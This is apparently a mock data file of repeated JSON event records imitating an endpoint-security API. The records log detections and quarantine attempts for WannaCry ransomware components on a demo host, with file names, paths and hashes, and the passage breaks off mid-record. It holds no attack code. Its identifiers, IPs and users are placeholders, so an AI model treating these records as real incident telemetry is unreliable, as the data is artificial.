-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526292","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526291","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526288","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526287","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526286","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558988","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558989","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558987","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558986","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558985","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558984","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":461000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.2CA2D550E6-100.SBX.VIOC","detection_id":"6419303574240493599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskse.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskse.exe","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":430000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4A468603FD.04426d77.auto.Talos","detection_id":"6419303574240493597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskdl.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskdl.exe","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":327000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419303574240493595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":313000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419303574240493594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"@WanaDecryptor@.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303574240493595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303574240493594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303569945526290","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303569945526289","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303565650558983","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":782000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558982","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558980","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558978","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":580000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.2CA2D550E6-100.SBX.VIOC","detection_id":"6419303569945526290","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskse.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskse.exe","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d","sha1":"be5d6279874da315e3080b06083757aad9b32c23","md5":"8495400f199ac77853c53b5a3f278f3e"},"parent":{"process_id":2920,"